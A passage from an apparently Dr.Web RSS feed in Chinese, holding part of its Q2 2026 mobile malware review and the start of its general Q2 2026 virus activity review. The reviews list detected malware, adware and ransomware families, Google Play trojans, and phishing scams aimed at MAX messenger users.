&lt;p&gt;第二季度最活跃的不良程序是模拟反病毒软件运行的 &lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; 应用，会谎称侦测到某种威胁，然后诱导用户购买完整版来“对抗”这些所谓威胁。此类伪造应用在安卓设备不良软件中的占比超过44%。&lt;/p&gt;

&lt;p&gt;最常见的广告软件是嵌入安卓应用的 &lt;a href="https://vms.drweb.cn/search/?q=Adware.AdPush&amp;lng=cn"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt; 模块。这些模块会显示误导用户的广告通知，同时也会收集各种敏感数据。此外，用户还经常遭遇优化器类程序 &lt;a href="https://vms.drweb.cn/search/?q=Adware.Bastion&amp;lng=cn"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;。这类程序会定期创建误导性消息通知，谎称系统出错或内存不足，而在所谓“优化”过程中会显示广告。广告程序 &lt;b&gt;Adware.Opensite.15&lt;/b&gt; 也再次高度活跃，攻击者将其伪装成作弊应用，声称能在游戏中获取资源，但实际上这些程序只会加载带有广告的网站。&lt;/p&gt;

&lt;p&gt;6月初，Dr.Web公司专家通报 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 活动，这是一种能够绕过安卓操作系统限制并在后台显示广告的木马。&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 利用的是第三方应用，并会根据被感染设备的制造商选择特定的技术手段。该木马的详细信息请参阅我们网站上的&lt;a href="https://news.drweb.cn/show/?i=15262" target="_blank"&gt;相关文章&lt;/a&gt;。&lt;/p&gt;

&lt;p&gt;在第二季度，我公司病毒分析师在Google Play目录中再次发现了多款为受害者订阅付费服务的恶意程序，其中包括 &lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;家族的代表。&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;第二季度主要移动安全事件：&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;银行木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 仍是安卓设备最常见的威胁&lt;/li&gt;
        &lt;li&gt;恶意软件编写者越来越频繁使用安卓应用修改工具来增强银行木马逃避反病毒软件侦测的能力&lt;/li&gt;
        &lt;li&gt;广告木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 的活动再次下降&lt;/li&gt;
        &lt;li&gt;发现能利用第三方应用来绕过按照操作系统的限制木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;，恶意功能是在后台显示广告&lt;/li&gt;
        &lt;li&gt;Google Play出现新的恶意软件&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Dr.Web for Android保护产品统计信息&lt;/h3&gt;

&lt;p&gt;&lt;b&gt;最常见的恶意软件&lt;/b&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.Click&amp;lng=cn"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测恶意Whats App Messenger修改版，这些修改版在用户不知情的情况下在后台加载各种网站。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4236&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;显示侵入式广告的木马程序。&lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 家族的木马通常伪装成普通应用进行传播，某些情况下依靠其他恶意软件安装到系统目录。进入安卓设备后这些广告软件木马通常会隐藏自身在系统中的存在，如隐藏自己在主屏幕菜单中的图标。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;银行木马程序，能拦截包含信贷机构发送的一次性验证码的短信、通知内容，并收集其他机密信息，包括受感染设备的技术数据、已安装应用程序列表、SIM卡信息、通话记录以及收发的短信。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.FakeApp&amp;lng=cn"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;能够下载其设置中指定的网站的木马，已知变种加载的是在线赌场。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;最常见的不良软件&lt;/b&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测假冒反病毒软件运行的广告应用。这种应用汇谎报发现安全威胁，诱骗用户支付费用购买完整版本。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.FakeMoney&amp;lng=cn"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测据谎称用户通过执行某些操作或任务就可赚钱的应用程序。这些程序模拟奖励累积，称积累到一定的金额就可用“提现”，但实际上用户根本不可能得到任何付款。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;最常见的风险程序&lt;/b&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Tool.Obfuscator.TrashCode&amp;lng=cn"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Tool.Obfuscator.TrashCode&amp;lng=cn"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;使用黑客工具篡改并注入恶意代码的安卓应用。进行篡改的目的是混淆程序逻辑，此技术常见于银行木马和盗版软件。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;使用工具NP Manager修改过的的安卓应用程序。此类程序中嵌入了一个特殊模块，可修改数字签名并绕过验证。所添加的混淆技术通常用于增加恶意软件的侦测分析难度。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Tool.LuckyPatcher&amp;lng=cn"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;一种能够修改已安装安卓应用（为其创建补丁）的工具，功能是改变其运行逻辑或绕过某些限制。例如，用户可借助此工具尝试禁用银行应用对ROOT权限的侦测，或在游戏中获取无限资源。该工具会从网络下载专门编写的脚本来创建补丁，而这些脚本可由任何用户编写并上传至公共数据库。此类脚本可能包含恶意功能，因此生成的补丁可能具有潜在风险。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;最常见的广告软件&lt;/b&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Adware.Bastion&amp;lng=cn"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测会定期创建误导性通知的所谓优化程序，这些通知谎称内存不足或存在系统错误，其目的是在所谓“优化”过程中显示广告。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;伪装成游戏作弊工具的应用，实际功能是投放广告。这些程序会从远程服务器接收配置信息，然后加载带有广告的目标网站，包括横幅广告、弹出式广告、视频广告等等。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Adware.AdPush&amp;lng=cn"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;一类可嵌入安卓应用的广告模块，通过展示容易误导用户的通知进行广告推送，如将广告伪装成操作系统通知的样式。此外，这些模块还能收集多种敏感数据，并具备下载其他应用并静默触发其安装的能力。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Adware.Fictus&amp;lng=cn"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;嵌入到热门安卓游戏和应用的克隆版本一种广告模块，利用名为net2share的专用打包工具集成到程序。嵌入广告模块的软件副本通过各种应用目录传播，一旦安装到设备就会显示垃圾广告。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Adware.Airpush&amp;lng=cn"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;嵌入在安卓应用中的软件模块，用于显示各种广告。不同版本和变种所显示的广告可以是通知、弹出窗口或横幅广告。攻击者通常利用这些模块传播恶意软件，诱使用户安装特定软件。这些模块还会将各种机密信息传输到远程服务器。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Google Play中的威胁&lt;/h3&gt;

&lt;p&gt;2026年第二季度，我公司的病毒分析师在Google Play目录中发现了多个新的 &lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; 木马程序，其功能是订阅付费服务。这些木马伪装成各种不同类型的软件进行传播：在线影院ShowLounge - TV &amp; Dramas（侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.25&lt;/b&gt;）、面向游戏玩家的AIM: Crosshair Asist（&lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.26&lt;/b&gt;）、游戏True Cargo Drive（&lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.27&lt;/b&gt;）、实用工具Battery 3D: Charge Effects（&lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.28&lt;/b&gt;）以及图像编辑器PixStudio - Photo Editor（&lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.29&lt;/b&gt;）。这些应用的总下载量已至少达到260万次。&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;2026年第二季度在Google Play发现的 &lt;b&gt;Android.Subscription&lt;/b&gt; 木马程序示例&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;此类恶意应用会加载特定网站，通过Wap Click技术为用户订阅付费移动服务：会向潜在受害者索取手机号码，输入后便会尝试激活相应服务。&lt;/p&gt;

&lt;p&gt;与此同时，Google Play中再次出现 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; 木马程序，这类木马同样会为用户订阅付费服务。攻击者将其伪装成即时通讯应用Chat Messages（侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2625&lt;/b&gt;）和Easy Messages（侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2632&lt;/b&gt;），以及系统优化工具Smart File Cleaner、Junk Clean Master和Fast Cleaner（分别侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2614&lt;/b&gt;、&lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2618&lt;/b&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2626&lt;/b&gt;）。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;一个隐藏 &lt;b&gt;Android.Joker&lt;/b&gt; 家族木马的恶意应用示例&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;我们建议用户安装Dr.Web安卓保护产品来保护安卓设备，抵御恶意程序和不良程序。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q2%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;失陷指标&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15275&amp;lng=cn</guid><title>Doctor Web：2026年第二季度病毒活动综述</title><link>https://news.drweb.cn/show/?i=15275&amp;lng=cn&amp;c=5</link><pubDate>Wed, 01 Jul 2026 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Dr.Web产品侦测统计信息显示，2026年第二季度侦测到的威胁总数较第一季度增长5.72%。独特威胁的数量大幅增加，达95.32%。最常见的恶意软件类型是广告类应用程序和广告木马、恶意挖矿程序，以及用于植入其他威胁的木马程序。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;电子邮件流量中最常侦测到的是恶意脚本和各种木马应用程序，其中包括下载器、释放器、密码窃取程序和挖矿程序。此外，后门程序、钓鱼文档和各种漏洞利用工具也较为常见。&lt;/p&gt;

&lt;p&gt;受到勒索软件感染的用户最常遭遇的加密器是 &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;、&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; 和 &lt;b&gt;Trojan.Encoder.37400&lt;/b&gt;。同时，与上一季度相比，提交给Dr.Web技术服务支持部门的解密求助请求数量有所减少。&lt;/p&gt;

&lt;p&gt;2026年第二季度，我公司互联网安全分析专家观察到针对 &lt;b&gt;MAX&lt;/b&gt; 即时通讯工具用户的网络钓鱼攻击数量有所增长。攻击者还利用当下的时事新闻热点，对流行的诈骗手段进行了相应的伪装和调整。&lt;/p&gt;

&lt;p&gt;今年4月 Microsoft Visual Studio Code 的一个更新中&lt;a href="https://news.drweb.cn/show/?i=15146" target="_blank"&gt;出现恶意代码&lt;/a&gt;，是一个木马脚本，存在于一个名为 &lt;b&gt;es5-ext&lt;/b&gt; 的公共JavaScript库中，而软件的更新包含此库。此脚本发现系统时区符合部分俄罗斯城市时区时便会触发，并在开发者控制台显示反俄煽动言论。&lt;/p&gt;

&lt;p&gt;5月，我公司&lt;a href="https://news.drweb.cn/show/?i=15253" target="_blank"&gt;提醒&lt;/a&gt; 用户一种名为 &lt;b&gt;JobStealer&lt;/b&gt; 的恶意程序正在传播，其主要目标是Mac和Windows用户。网络犯罪分子将其伪装成用于在线面试的软件。JobStealer木马能够窃取多种机密信息，包括约300个浏览器加密货币钱包插件的数据、Telegram即时通讯软件的文件、浏览器中保存的密码、银行卡数据以及Cookie文件。&lt;/p&gt;

&lt;p&gt;6月，Dr.Web公司反病毒实验室的专家&lt;a href="https://news.drweb.cn/show/?i=15262" target="_blank"&gt;报告&lt;/a&gt;出现一种新的安卓广告木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;。该木马能够绕过安卓操作系统限制后台显示广告。木马会利用第三方应用程序，并根据目标设备的生产厂商选择具体的攻击手法。&lt;/p&gt;

&lt;p&gt;在针对安卓设备的恶意程序中，&lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 银行木马家族仍是在受保护设备侦测数量方最多的威胁。与此同时，病毒编写者在大量使用各种安卓程序篡改工具，目的是让恶意软件能够逃避反病毒软件的侦测。此外，第二季度我们的病毒分析师还在Google Play官方商店中发现了一系列新的木马程序，功能是诱骗用户订阅付费移动服务。&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;第二季度主要趋势&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;在受保护设备侦测到的威胁数量增加。&lt;/li&gt;
        &lt;li&gt;侦测到的独特威胁数量大幅增加。&lt;/li&gt;
        &lt;li&gt;与上一季度相比，文件被勒索软件加密的用户的解密申请数量减少。&lt;/li&gt;
        &lt;li&gt;诈骗者开始频繁攻击俄罗斯即时通讯软件 MAX 的用户。&lt;/li&gt;
        &lt;li&gt;&lt;b&gt;Android.Banker&lt;/b&gt; 银行木马仍是安卓设备上最常见的恶意程序。&lt;/li&gt;
        &lt;li&gt;我公司专家发现新的广告木马，命名为 &lt;b&gt;Android.MagicAd.1&lt;/b&gt;，该木马能够绕过安卓操作系统的限制以后台模式显示广告。&lt;/li&gt;
        &lt;li&gt;病毒编写者正在传播恶意程序 JobStealer，目的是窃取运行 Mac 和 Windows 系统的计算机用户的机密数据。&lt;/li&gt;
        &lt;li&gt;在 Microsoft Visual Studio Code 的一个更新中侦测到恶意代码。&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Doctor Web统计服务收集的数据&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2026年第二季度最常见威胁：&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Adware.Downware.20091&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;广告软件，是安装盗版程序过程中用到的中间环节程序。&lt;/dd&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;用Go编程语言编写的木马程序，专门用于向目标系统植入各类挖矿工具和广告软件。为DLL文件形式，存储路径为 &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;。木马利用torrent客户端uTorrent的DLL搜索顺序劫持漏洞来进行启动。.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;侦测浏览器插件WinSafe的恶意组件。该组件是一个JavaScript脚本，会在浏览器不断显示广告。&lt;/dd&gt;
    &lt;dt&gt;Trojan.Starter.8319&lt;/dt&gt;
    &lt;dd&gt;恶意XML脚本，能够启动木马 &lt;a href="https://vms.drweb.cn/search/?q=Trojan.AutoIt.289&amp;lng=cn"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; 及其组件。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;邮箱流量恶意程序统计数据&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2026年第二季度邮箱流量中最常见的威胁：&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;X97M.DownLoader.2343&lt;/dt&gt;
    &lt;dd&gt;一个包含 OLE 对象的 XLSX 文件（Microsoft Excel 电子表格格式），该 OLE 对象会讲恶意文件下载到受攻击的计算机。&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;利用MicrosoftOffice文档漏洞的木马下载器家族，功能是将其他恶意软件下载到受攻击的计算机。&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;MicrosoftOffice漏洞利用程序，可执行任意代码。&lt;/dd&gt;
    &lt;dt&gt;JS.Muldrop.1171&lt;/dt&gt;
    &lt;dd&gt;一种JavaScript 格式的恶意脚本，用于在目标系统中启动其内部隐藏的恶意软件（ВПО）。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;加密器&lt;/h3&gt;

&lt;p&gt;2026年第二季度勒索木马受害者的文件解密申请量较第一季度略有减少，减幅为2.67%。&lt;/p&gt;

&lt;p&gt;Doctor Web公司技术支持部门接收到的解密申请量动态：&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2026年第二季度最常见的加密器：&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 占用户申请的 14.47%&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 占用户申请的 5.26%&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.37400&lt;/b&gt; — 占用户申请的 3.95%&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.cn/search/?q=Trojan.Encoder.35209&amp;lng=cn"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 占用户申请的 3.29%&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44197&lt;/b&gt; — 占用户申请的 2.63%&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;网络诈骗&lt;/h3&gt;

&lt;p&gt;Dr.Web互联网分析专家在2026年第二季度观察到的一个趋势是，随着俄罗斯即时通讯软件MAX用户群体的增长，网络犯罪分子也更多针对其用户展开攻击，使用的是一些此前针对Telegram和WhatsApp等其他即时通讯工具用户的已知诈骗手段。例如，我们的专家发现了大量以各种投票为幌子的诈骗网站，目的是窃取MAX账户。潜在受害者会被邀请参与某项比赛的投票，但首先需要登录账户，输入手机号码以及收到验证码。一旦用户输入所有数据，攻击者就获得了访问用户账户的权限。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;一个钓鱼网站示例，诈骗者利用这种方式获取对受害者MAX即时通讯账户的访问权限&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dr.Web互联网分析专家在第二季度注意到再次出现了一批与投资相关的诈骗网站，而且网络犯罪分子也紧跟当前趋势，继续大肆利用人工智能做噱头。例如，他们在一些互联网资源向潜在受害者提议加入一个新的投资项目，声称该项目与俄罗斯大型信贷机构有关。诈骗者承诺提供基于ChatGPT的专门聊天机器人访问权限，可帮助投资。网站访问者在成为"项目"参与者之前需要进行注册并提供个人信息。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
